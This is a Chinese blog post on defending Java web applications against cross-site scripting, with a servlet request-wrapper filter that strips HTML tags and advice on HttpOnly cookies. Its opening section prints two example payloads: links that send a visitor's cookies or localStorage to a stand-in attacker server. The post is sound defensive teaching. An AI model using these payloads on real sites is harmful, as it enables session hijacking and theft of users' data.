Java Web项目抵御跨站脚本攻击(前后端共御)

最新推荐文章于 2024-05-31 15:59:54 发布
最新推荐文章于 2024-05-31 15:59:54 发布
阅读量2.2k 收藏 5
点赞数 2
分类专栏: Java Web 文章标签: java javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Knightletter/article/details/121271068
版权

目录

1. XSS攻击原理

跨站脚本(XSS)攻击,指利用服务器漏洞将恶意代码以文本的形式混杂进请求数据中提交给服务器,服务器在未来渲染视图的时候会将该恶意代码也携带加载,客户端执行恶意脚本后会造成重要信息泄露。
XSS攻击的恶意代码通常是HTML标签包裹JavaScript脚本,形如<script>alert("恶意脚本")</script>,当页面中出现这种结构的文本时,浏览器会误认为是正常的标签而进行渲染。
例如,攻击者的服务器为xxx.xx.xxx.xx,它可以在超链接上裹挟脚本,通过存在漏洞的表单或者接口将此文本提交给服务器存储:

<a href=javascript:location.href="xxx.xx.xxx.xx?"+document.cookie.replaceAll("; ","&")>点我跳转</a>
<a href=javascript:location.href="xxx.xx.xxx.xx?abc="+window.localStorage.getItem("abc")>点我跳转</a>

其它用户触发该部分内容后会被流量劫持,进而将本地的Cookie和localStorage发送到了攻击者的服务器上。
在这里插入图片描述

2. 抵御思路

XSS攻击是利用了HTML标签转义上的漏洞实现代码注入的,所以抵御XSS的思路也应当从此入手。前端和服务端都有相应的职责来提升网站的安全性,不过数据最终是由服务端进行业务处理并持久化的,所以最终屏障应落在服务端上。

2.1 针对前端

在网站上动态渲染任意HTML元素是非常危险的,前端需谨慎书写会渲染HTML标签的操作行为,例如原生JS中的innerHTML属性、jQuery中的html()函数、Vue.js中的v-html指令,仅在可信的内容上使用,永远不要在用户提交的内容上采取这些动态渲染的操作
对于一些典型的表单和输入框提交逻辑,前端应在JS中完成初步校验,确保发送到服务端的数据具备基本的规范。

2.2 针对服务端

服务端应该站在“前端发送过来的数据极其不安全”的视角去处理,最大限度去过滤掉不规范的数据。因此,我们可以设置一个全局的过滤器,拦截所有用户请求,并将请求参数中所有的value值进行过滤(去掉HTML结构的文本上的标签,仅保留内容),例如文本<script>alert('恶意脚本')</script>最终会被转换为文本alert('恶意脚本'),因为失去了HTML结构,所以未来进行视图渲染时它不会被识别成JS代码。
在这里插入图片描述
此外,XSS攻击的一大重灾对象就是Cookie,Cookie的重要性不言而喻,它可能直接保存了用户的Session凭证,一旦泄露,攻击者就可以在不知道该用户账号密码的情况下虚拟该用户身份,不过好在Cookie可以在客户端上进行简单的安全设置:开启HttpOnly属性的Cookie条目将无法被JS获取,服务端只要确保返回给用户的Cookie信息中对该属性进行了设置即可。(Tomcat7、8已默认开启)

3. 代码实现

我们通过继承javax.servlet.http.HttpServletRequestWrapper来实现一个自定义装饰类,然后在该类中覆写获取请求参数的相关方法,这样便可以在不实现HttpServletRequest接口的情况下轻松的对请求方法进行增强。
获取到请求参数中的value串后,我们需要对其进行过滤,此处我们调用hutool工具包中的HtmlUtil.filter(String htmlContent)方法来去除文本中的HTML标签。

import cn.hutool.core.util.StrUtil;
import cn.hutool.http.HtmlUtil;
import cn.hutool.json.JSONUtil;

import javax.servlet.ReadListener;
import javax.servlet.ServletInputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;
import java.io.*;
import java.nio.charset.Charset;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.Map;

/**
 * 用于抵御XSS攻击的请求装饰器
 * StrUtil.hasEmpty用于判断是否为空字符串
 * HtmlUtil.filter用于过滤字符串中的HTML元素(去除标签,保留内容)
 */
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {
    public XssHttpServletRequestWrapper(HttpServletRequest request) {
        super(request);
    }

    @Override
    public String getParameter(String name) {
        String value = super.getParameter(name);
        if (!StrUtil.hasEmpty(value)) {
            value = HtmlUtil.filter(value);
        }
        return value;
    }

    @Override
    public String[] getParameterValues(String name) {
        String[] values = super.getParameterValues(name);
        if (values != null) {
            for (int i = 0; i < values.length; i++) {
                String value = values[i];
                if (!StrUtil.hasEmpty(value)) {
                    value = HtmlUtil.filter(value);
                }
                values[i] = value;
            }
        }
        return values;
    }

    @Override
    public Map<String, String[]> getParameterMap() {
        Map<String, String[]> parameters = super.getParameterMap();
        LinkedHashMap<String, String[]> map = new LinkedHashMap<>();
        if (parameters != null) {
            for (String key : parameters.keySet()) {
                String[] values = parameters.get(key);
                if (values != null) {
                    for (int i = 0; i < values.length; i++) {
                        String value = values[i];
                        if (!StrUtil.hasEmpty(value)) {
                            value = HtmlUtil.filter(value);
                        }
                        values[i] = value;
                    }
                }
                map.put(key, values);
            }
        }
        return map;
    }

    @Override
    public String getHeader(String name) {
        String value = super.getHeader(name);
        if (!StrUtil.hasEmpty(value)) {
            value = HtmlUtil.filter(value);
        }
        return value;
    }

    @Override
    public ServletInputStream getInputStream() throws IOException {
        //将in流中的内容转换成成字符串body
        InputStream in = super.getInputStream();
        StringBuffer body = new StringBuffer();
        InputStreamReader reader = new InputStreamReader(in, Charset.forName("UTF-8"));
        BufferedReader buffer = new BufferedReader(reader);
        String line = buffer.readLine();
        while (line != null) {
            body.append(line);
            line = buffer.readLine();
        }
        buffer.close();
        reader.close();
        in.close();

        //将字符串body转换为map集合,然后将其中的字符串过滤,将结果转换为JSON格式的字符串
        Map<String, Object> map = JSONUtil.parseObj(body.toString());
        Map<String, Object> resultMap = new HashMap<>(map.size());
        for (String key : map.keySet()) {
            Object value = map.get(key);
            if (map.get(key) instanceof String) {
                resultMap.put(key, HtmlUtil.filter(value.toString()));
            } else {
                resultMap.put(key, value);
            }
        }
        String str = JSONUtil.toJsonStr(resultMap);
        final ByteArrayInputStream bain = new ByteArrayInputStream(str.getBytes());

        //返回一个ServletInputStream对象,将ByteArrayInputStream引入
        return new ServletInputStream() {
            @Override
            public boolean isFinished() {
                return false;
            }

            @Override
            public boolean isReady() {
                return false;
            }

            @Override
            public void setReadListener(ReadListener readListener) {

            }

            @Override
            public int read() throws IOException {
                return bain.read();
            }
        };
    }
}

最后我们只需注册一个全局过滤器,将一切HTTP请求交给我们封装的请求装饰类处理即可:

import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;

/**
 * 用于抵御XSS攻击的全局过滤器
 */
@WebFilter(urlPatterns = "/*")
public class XssFilter implements Filter {
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        Filter.super.init(filterConfig);
    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        XssHttpServletRequestWrapper wrapper = new XssHttpServletRequestWrapper((HttpServletRequest) servletRequest);
        filterChain.doFilter(wrapper,servletResponse);
    }

    @Override
    public void destroy() {
        Filter.super.destroy();
    }
}

对于返回给客户端的Cookie中的HttpOnly属性,只需调用Coookie.setHttpOnly(boolean isHttpOnly)方法即可进行设置。

啦啦啦小骑士
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Java中的安全性问题,如跨站脚本攻击(XSS)和SQL注入等
编程小弟的博客
04-15 633
Java中的安全性问题涉及多个方面,包括跨站脚本攻击(Cross-Site Scripting,XSS)和SQL注入等。这些攻击都是由于程序在处理用户输入时未能有效过滤或转义恶意代码,导致攻击者能够插入并执行恶意脚本或命令。跨站脚本攻击是一种安全漏洞,攻击者可以在其中注入恶意脚本到网页中,当其他用户浏览该网页时,恶意脚本将在用户的浏览器中执行。这可能导致用户会话的劫持、隐私数据的泄露或其他恶意行为。在Java Web应用中,XSS攻击通常发生在以下几种情况:为了防止XSS攻击,开发者应该:SQL注入是一种攻
XSS攻击以及java应对措施
qq_43456605的博客
05-18 5111
随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行 “查漏补缺”。XSS 全称 Cross Site Scripting,跨站脚本攻击
WEB攻防-JAVAWEB项目常见漏洞
最新发布
weixin_45534587的博客
05-31 803
1.JavaWeb常见安全及代码逻辑2.目录遍历&身份验证&逻辑&JWT3.访问控制&安全组件&越权&三方组件本篇主要了解以上问题在javaweb中的呈现,第一个重点理解URL与javaweb代码框架的对应方式,java在没有代码的情况下是很难渗透的,下面的内容也是针对白盒的第二个重点是JWT身份验证/攻击。
Java中的跨站脚本攻击(XSS)处理技术
Oaklkm的博客
12-18 1076
跨站脚本攻击(XSS)是网络攻击中非常常见的一种形式,对网站的安全性和用户的隐私构成了严重威胁。在Java开发中,我们应该采取一系列措施来防范和处理XSS攻击,包括输入验证、编码输出、使用安全的API、设置HTTP头、内容安全策略、输入过滤和使用安全的框架等。同时,我们还需要定期进行安全审计、更新和修补漏洞、监控和日志记录、定期培训、代码审查、测试和验证等措施来确保应用程序的安全性。
Java中的10种方法防止XSS攻击
热门推荐
qq_28245087的博客
06-29 1万+
这些方法包括输入验证和过滤、安全的HTML和URL编码、Content Security Policy(CSP)的使用、安全的模板引擎和富文本编辑器、用户输入的验证和限制、安全的Cookie设置以及防止跨站点请求伪造(CSRF)。通过实施这些方法,可以降低XSS攻击的风险,保护应用程序和用户的数据安全。通过使用安全的Cookie设置,您可以增加Web应用程序的安全性,保护用户的身份验证和敏感信息免受攻击和滥用。通过验证和限制用户输入,您可以增加应用程序的安全性和可靠性,防止潜在的安全漏洞和错误数据的影响。
web项目配置防止跨站点请求(XSS攻击)的过滤器
master_02的博客
11-23 1539
一、Microsoft Windows MHTML (XSS)跨站点脚本编制漏洞描述 XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见于web项目中的计算机安全漏洞。 1、严重性:中危。 2、风险:可能会窃取或操纵客户会话和 cookie,它们可能用于模仿合法用户,从而使黑客能够以该用户身份查 看或变更用户记录以及执行事务。 3、原因:未对用户输入正确执行危险...
Java - Spring Boot项目抵御XSS攻击
Mryfl的博客
12-03 1282
意思是跨站脚本攻击,英文全称Cross Site Scripting,为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。
XSS跨域攻击在web项目中的防范,基于antisamy技术
07-10
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许恶意用户在Web应用程序中注入可执行的脚本代码。这些注入的脚本可能在其他用户的浏览器中执行,导致敏感数据泄露、会话劫持、钓鱼攻击等...
基于javajava项目源码在线相册系统.zip
05-27
- **XSS和CSRF防护**:使用防护库防止跨站脚本攻击和跨站请求伪造。 - **DDoS防御**:配合防火墙和云服务提供的DDoS防护,抵御大规模攻击。 - **数据备份与恢复**:定期备份数据库,确保数据安全,同时有灾备恢复...
基于PHP MySQL实现农产品特卖网站系统【优质毕业设计、课程设计项目】.zip
05-07
6. 安全性:项目需要考虑SQL注入、XSS(跨站脚本攻击)等网络安全问题。开发者应使用预编译语句或参数化查询来防止SQL注入,对用户输入进行过滤和验证,以抵御XSS攻击。 7. 配置环境:项目提供了配置环境说明,帮助...
基于JAVA的安全电子商务.zip
03-26
同时,对输入数据进行过滤和转义,以及使用Content Security Policy(CSP)可抵御跨站脚本(XSS)攻击。 8. **Spring Security框架**:Spring Security是Java生态系统中广泛使用的安全框架,它提供了身份验证、授权、...
Java安全性编程实例.zip_java入门
09-24
在实践中,还需要关注SQL注入、跨站脚本攻击(XSS)和跨站请求伪造(CSRF)等常见Web安全问题。学习如何使用预编译语句防止SQL注入,利用验证码和HTTP头验证抵御XSS和CSRF攻击,能显著增强应用程序的安全性。 文件...
Java代码审计】XSS漏洞产生原理及其修复
m0_62783065的博客
05-17 4995
Java代码审计】XSS漏洞产生原理及其修复
Java后台解决request请求体不能重复读取+解决XSS漏洞问题
BHSZZY的博客
08-24 1966
本文使用了3个java类,原理是使用过滤器,封装一个自定义的HttpServletRequest对象,重写其中的、等方法,替换掉非法字符\等,使得从request中获得的key-value类型参数、header参数、请求体(包含json)参数是合法字符,以防止XSS漏洞;同时增加了request请求体可以重复读取的功能。
java 过滤跨站攻击_存储XSS跨站脚本攻击过滤解决方案
weixin_29625619的博客
02-16 927
漏洞描述:本页面存在跨站脚本攻击。跨站脚本漏洞,即XSS,通常用Javascript语言描述,它允许攻击者发送恶意代码给另一个用户。因为浏览器无法识别脚本是否可信,跨站漏洞脚本便运行并让攻击者获取其他用户的cookie或session。加固建议:总体修复方式:验证所有输入数据,有效检测攻击;对所有输出数据进行适当的编码,以防止任何已成功注入的脚本在浏览器端运行。具体如下 :输入验证:某个数据被接受...
Java 工具类库-----Hutool
qq_43842093的博客
08-05 873
这个工具就更厉害了,完全不需要类似quartz这样的框架来做定时任务,而且CronUtil也不需要任何其他依赖,只需要在resources下建一个配置文件,然后在程序启动的时候将定时任务开启就行了,如Halo的定时备份功能(每天凌晨1点备份一次)。主要是在登录的时候还有修改密码的时候用到的,因为数据库里面的密码是md5加密处理的,所以登录的时候需要先加密之后再到数据库进行查询,以前,打开搜索引擎 -> 搜“Java MD5加密” -> 打开某篇博客-> 复制粘贴 -> 改改好用。
java跨站攻击_安全测试-跨站脚本攻击(xss)
weixin_39647471的博客
02-20 521
跨站脚本简称XSS(cross sites script),是web安全里比较重要也比较普遍的一种安全漏洞。跨站脚本是指输入恶意的代码,如果程序没有对输入输出进行验证,则浏览器将会被攻击者控制。可以得到用户cookie、系统、浏览器信息,保存型xss还可以进行钓鱼,以获取更多的用户信息。最常见的测试跨站脚本的方法,输入alert(1)以及它的各种变体alert(1) 实体%3Cscript%3Ea...
java 跨站攻击脚本过滤工具类
qq_34874784的博客
11-23 397
java 跨站攻击脚本过滤工具类
跨站脚本攻击(XSS)及防范措施
oscar999的专栏
04-22 3998
á 有两种表示方式: U+00C1 U+0041 U+0301 Unicode标准定义了四种范化形式: D: NFD 典型分解 KD: NFKD 规范分解,规范组成 C: NFC 兼容性分解 KC: NFKC 兼容性分解,规范组成 NF - normalization-type NO_DECOMPOSITION: 不分解, 不对字符串做任何范化 matplotlib ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值